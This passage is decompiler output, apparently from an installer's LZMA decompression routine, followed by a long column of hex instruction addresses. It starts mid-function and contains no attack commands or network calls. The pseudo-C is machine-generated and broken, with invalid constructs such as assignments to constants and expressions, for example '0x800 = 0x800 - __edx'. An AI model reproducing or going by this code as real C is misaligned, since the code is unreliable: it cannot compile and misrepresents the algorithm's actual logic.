													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406365
                                                                                                                                                              0x00406365
                                                                                                                                                              0x00406369
                                                                                                                                                              0x00406376
                                                                                                                                                              0x00406380
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040636b
                                                                                                                                                              0x0040636b
                                                                                                                                                              0x004063a6
                                                                                                                                                              0x004063a9
                                                                                                                                                              0x004063ac
                                                                                                                                                              0x004063af
                                                                                                                                                              0x004063af
                                                                                                                                                              0x004063b2
                                                                                                                                                              0x004063b9
                                                                                                                                                              0x004063be
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x004062a2
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406617
                                                                                                                                                              0x0040661d
                                                                                                                                                              0x00406623
                                                                                                                                                              0x00406629
                                                                                                                                                              0x00406643
                                                                                                                                                              0x00406646
                                                                                                                                                              0x0040664c
                                                                                                                                                              0x00406657
                                                                                                                                                              0x00406659
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040663a
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x00406663
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406665
                                                                                                                                                              0x00406669
                                                                                                                                                              0x00406818
                                                                                                                                                              0x0040682e
                                                                                                                                                              0x00406836
                                                                                                                                                              0x0040683d
                                                                                                                                                              0x0040683f
